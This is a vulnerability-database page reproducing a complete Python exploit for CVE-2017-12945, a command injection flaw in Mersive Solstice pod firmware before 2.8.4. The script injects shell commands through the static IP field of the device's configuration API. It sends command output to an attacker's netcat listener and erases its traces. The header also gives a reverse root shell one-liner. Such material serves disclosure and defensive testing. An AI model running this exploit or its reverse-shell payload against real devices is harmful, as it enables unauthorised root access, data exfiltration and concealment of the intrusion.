Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Mersive Solstice 2.8.0 - Remote Code Execution

🗓️ 28 Nov 2019 00:00:00Reported by Alexandre TeyarType 
exploitdb
 exploitdb🔗 www.exploit-db.com👁 481 Views

Mersive Solstice 2.8.0 - Remote Code Execution blind OS command injection vulnerability in Solstice devices running firmware prior to 2.8.4. Launch netcat listener before running exploit to get command output

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Mersive Solstice 2.8.0 - Remote Code Execution Exploit
29 Nov 201900:00
zdt
Circl		CVE-2017-12945
28 Feb 202417:47
circl
CVE		CVE-2017-12945
27 Nov 201915:54
cve
Cvelist		CVE-2017-12945
27 Nov 201915:54
cvelist
exploitpack		Mersive Solstice 2.8.0 - Remote Code Execution
28 Nov 201900:00
exploitpack
NVD		CVE-2017-12945
27 Nov 201916:15
nvd
OSV		CVE-2017-12945
27 Nov 201916:15
osv
Packet Storm		Mersive Solstice 2.8.0 Remote Code Execution
28 Nov 201900:00
packetstorm
Prion		Input validation
27 Nov 201916:15
prion
RedhatCVE		CVE-2017-12945
22 May 202505:43
redhatcve
Rows per page
# Exploit Title: Mersive Solstice 2.8.0 - Remote Code Execution
# Google Dork: N/A
# Date: 2016-12-23
# Exploit Author: Alexandre Teyar
# Vendor Homepage: https://www2.mersive.com/
# Firmware Link: http://www.mersive.com/Support/Releases/SolsticeServer/SGE/Android/2.8.0/Solstice.apk
# Versions: 2.8.0
# Tested On: Mersive Solstice 2.8.0
# CVE: CVE-2017-12945
# Description       : This will exploit an (authenticated) blind OS command injection 
#                     vulnerability present in Solstice devices running versions
#                     of the firmware prior to 2.8.4.
# Notes             : To get the the command output (in piped-mode), a netcat listener 
#                     (e.g. 'nc -lkvp <LPORT>') needs to be launched before 
#                     running the exploit.
#                     To get an interactive root shell use the following syntax
#                     'python.exe .\CVE-2017-12945.py -pass <PASSWORD>
#                     -rh <RHOST> -p "busybox nc <LHOST> <LPORT>
#                     -e /system/bin/sh -i"'.


#!/usr/bin/env python3

import argparse
import logging
import requests
import sys
import time


def parse_args():
    """ Parse and validate the command line supplied by users
    """
    parser = argparse.ArgumentParser(
                description="Solstice Pod Blind Command Injection"
            )

    parser.add_argument(
        "-d",
        "--debug",
        dest="loglevel",
        help="enable verbose debug mode",
        required=False,
        action="store_const",
        const=logging.DEBUG,
        default=logging.INFO
    )
    parser.add_argument(
        "-lh",
        "--lhost",
        dest="lhost",
        help="the listening address",
        required=False,
        type=str
    )
    parser.add_argument(
        "-lp",
        "--lport",
        dest="lport",
        help="the listening port - default 4444",
        required=False,
        default="4444",
        type=str
    )
    parser.add_argument(
        "-p",
        "--payload",
        dest="payload",
        help="the command to execute",
        required=True,
        type=str
    )
    parser.add_argument(
        "-pass",
        "--password",
        dest="password",
        help="the target administrator password",
        required=False,
        default="",
        type=str
    )
    parser.add_argument(
        "-rh",
        "--rhost",
        dest="rhost",
        help="the target address",
        required=True,
        type=str
    )

    return parser.parse_args()


def main():
    try:
        args = parse_args()

        lhost = args.lhost
        lport = args.lport
        password = args.password
        rhost = args.rhost

        logging.basicConfig(
            datefmt="%H:%M:%S",
            format="%(asctime)s: %(levelname)-8s %(message)s",
            handlers=[logging.StreamHandler()],
            level=args.loglevel
        )

        # Redirect stdout and stderr to <FILE>
        # only when the exploit is launched in piped mode
        if lhost and lport:
            payload = args.payload + " > /data/local/tmp/rce.tmp 2>&1"
            logging.info(
                "attacker listening address: {}:{}".format(lhost, lport)
            )
        else:
            payload = args.payload

        logging.info("solstice pod address: {}".format(rhost))

        if password:
            logging.info(
                "solstice pod administrator password: {}".format(password)
            )

        # Send the payload to be executed
        logging.info("sending the payload...")
        send_payload(rhost, password, payload)

        # Send the results of the payload execution to the attacker
        # using 'nc <LHOST> <LPORT> < <FILE>' then remove <FILE>
        if lhost and lport:
            payload = (
                "busybox nc {} {} < /data/local/tmp/rce.tmp ".format(
                    lhost, lport
                )
            )

            logging.info("retrieving the results...")
            send_payload(rhost, password, payload)

            # Erase exploitation traces
            payload = "rm -f /data/local/tmp/rce.tmp"

            logging.info("erasing exploitation traces...")
            send_payload(rhost, password, payload)

    except KeyboardInterrupt:
        logging.warning("'CTRL+C' pressed, exiting...")
        sys.exit(0)


def send_payload(rhost, password, payload):
    URL = "http://{}/Config/service/saveData".format(rhost)

    headers = {
        "Content-Type": "application/json",
        "X-Requested-With": "XMLHttpRequest",
        "Referer": "http://{}/Config/config.html".format(rhost)
    }

    data = {
        "m_networkCuration":
        {
            "ethernet":
            {
                "dhcp": False,
                "staticIP": "; {}".format(payload),
                "gateway": "",
                "prefixLength": 24,
                "dns1": "",
                "dns2": ""
            }
        },
        "password": "{}".format(password)
    }

    # Debugging using the BurpSuite
    # proxies = {
    #     'http': 'http://127.0.0.1:8080',
    #     'https': 'https://127.0.0.1:8080'
    # }

    try:
        logging.info("{}".format(payload))

        response = requests.post(
            URL,
            headers=headers,
            # proxies=proxies,
            json=data
        )

        logging.debug(
            "{}".format(response.json())
        )

        # Wait for the command to be executed
        time.sleep(2)

    except requests.exceptions.RequestException as ex:
        logging.error("{}".format(ex))
        sys.exit(0)


if __name__ == "__main__":
    main()

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
28 Nov 2019 00:00Current
9High risk
Vulners AI Score9
CVSS 3.18.8
CVSS 29
EPSS0.25432
mersive solsticeremote code executionos command injectionfirmwarenetcat listenerexploitcve-2017-12945
481